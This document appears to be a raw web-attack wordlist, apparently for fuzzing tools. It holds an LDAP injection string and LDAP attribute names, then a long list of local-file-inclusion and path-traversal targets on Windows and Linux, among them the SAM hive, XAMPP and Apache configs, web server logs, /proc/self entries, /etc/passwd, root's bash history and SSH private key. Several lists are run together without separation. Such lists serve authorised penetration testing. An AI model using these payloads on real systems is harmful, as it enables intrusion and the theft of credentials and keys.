*)(uid=*))(|(uid=* | |
c | |
cn | |
co | |
commonName | |
dc | |
facsimileTelephoneNumber | |
givenName | |
gn | |
homePhone | |
id | |
jpegPhoto | |
l | |
mobile | |
name | |
o | |
objectClass | |
ou | |
owner | |
pager | |
password | |
sn | |
st | |
surname | |
uid | |
username | |
userPassword | |
/proc/self/cmdline | |
/proc/self/stat | |
/proc/self/status | |
/proc/self/fd/0 | |
/proc/self/fd/1 | |
/proc/self/fd/2 | |
/proc/self/fd/3 | |
/proc/self/fd/4 | |
/proc/self/fd/5 | |
/proc/self/fd/6 | |
/proc/self/fd/7 | |
/proc/self/fd/8 | |
/proc/self/fd/9 | |
/proc/self/fd/10 | |
/proc/self/fd/11 | |
/proc/self/fd/12 | |
/proc/self/fd/13 | |
/proc/self/fd/14 | |
/proc/self/fd/15 | |
/proc/self/fd/16 | |
/proc/self/fd/17 | |
/proc/self/fd/18 | |
/proc/self/fd/19 | |
/proc/self/fd/20 | |
/proc/self/fd/21 | |
/proc/self/fd/22 | |
/proc/self/fd/23 | |
/proc/self/fd/24 | |
/proc/self/fd/25 | |
/proc/self/fd/26 | |
/proc/self/fd/27 | |
/proc/self/fd/28 | |
/proc/self/fd/29 | |
/proc/self/fd/30 | |
/proc/self/fd/31 | |
/proc/self/fd/32 | |
/proc/self/fd/33 | |
/proc/self/fd/34 | |
/proc/self/fd/35php://input | |
C:\boot.ini | |
C:\WINDOWS\win.ini | |
C:\WINDOWS\php.ini | |
C:\WINDOWS\System32\Config\SAM | |
C:\WINNT\php.ini | |
C:\xampp\phpMyAdmin\config.inc | |
C:\xampp\phpMyAdmin\phpinfo.php | |
C:\xampp\phpmyadmin\config.inc | |
C:\xampp\phpmyadmin\phpinfo.php | |
C:\xampp\phpmyadmin\config.inc.php | |
C:\xampp\phpMyAdmin\config.inc.php | |
C:\xampp\apache\conf\httpd.conf | |
C:\xampp\FileZillaFTP\FileZilla Server.xml | |
C:\xampp\MercuryMail\mercury.ini | |
C:\mysql\bin\my.ini | |
C:\xampp\php\php.ini | |
C:\xampp\phpMyAdmin\config.inc.php | |
C:\xampp\tomcat\conf\tomcat-users.xml | |
C:\xampp\tomcat\conf\web.xml | |
C:\xampp\sendmail\sendmail.ini | |
C:\xampp\webalizer\webalizer.conf | |
C:\xampp\webdav\webdav.txt | |
C:\xampp\apache\logs\error.log | |
C:\xampp\apache\logs\access.log | |
C:\xampp\FileZillaFTP\Logs | |
C:\xampp\FileZillaFTP\Logs\error.log | |
C:\xampp\FileZillaFTP\Logs\access.log | |
C:\xampp\MercuryMail\LOGS\error.log | |
C:\xampp\MercuryMail\LOGS\access.log | |
C:\xampp\mysql\data\mysql.err | |
C:\xampp\sendmail\sendmail.log | |
C:\apache\log\error.log | |
C:\apache\log\access.log | |
C:\apache\log\error_log | |
C:\apache\log\access_log | |
C:\apache2\log\error.log | |
C:\apache2\log\access.log | |
C:\apache2\log\error_log | |
C:\apache2\log\access_log | |
C:\log\error.log | |
C:\log\access.log | |
C:\log\error_log | |
C:\log\access_log | |
C:\apache\logs\error.log | |
C:\apache\logs\access.log | |
C:\apache\logs\error_log | |
C:\apache\logs\access_log | |
C:\apache2\logs\error.log | |
C:\apache2\logs\access.log | |
C:\apache2\logs\error_log | |
C:\apache2\logs\access_log | |
C:\logs\error.log | |
C:\logs\access.log | |
C:\logs\error_log | |
C:\logs\access_log | |
C:\log\httpd\access_log | |
C:\log\httpd\error_log | |
C:\logs\httpd\access_log | |
C:\logs\httpd\error_log | |
C:\opt\xampp\logs\access_log | |
C:\opt\xampp\logs\error_log | |
C:\opt\xampp\logs\access.log | |
C:\opt\xampp\logs\error.log | |
C:\Program Files\Apache Group\Apache\logs\access.log | |
C:\Program Files\Apache Group\Apache\logs\error.log | |
C:\Program Files\Apache Group\Apache\conf\httpd.conf | |
C:\Program Files\Apache Group\Apache2\conf\httpd.conf | |
C:\Program Files\xampp\apache\conf\httpd.conf | |
/etc/passwd | |
/etc/group | |
/etc/hosts | |
/etc/motd | |
/etc/issue | |
/etc/bashrc | |
/etc/apache2/apache2.conf | |
/etc/apache2/ports.conf | |
/etc/apache2/sites-available/default | |
/etc/httpd/conf/httpd.conf | |
/etc/httpd/conf.d | |
/etc/httpd/logs/access.log | |
/etc/httpd/logs/access_log | |
/etc/httpd/logs/error.log | |
/etc/httpd/logs/error_log | |
/etc/init.d/apache2 | |
/etc/mysql/my.cnf | |
/etc/nginx.conf | |
/opt/lampp/logs/access_log | |
/opt/lampp/logs/error_log | |
/opt/lamp/log/access_log | |
/opt/lamp/logs/error_log | |
/proc/self/environ | |
/proc/version | |
/proc/cmdline | |
/proc/mounts | |
/proc/config.gz | |
/root/.bashrc | |
/root/.bash_history | |
/root/.ssh/authorized_keys | |
/root/.ssh/id_rsa | |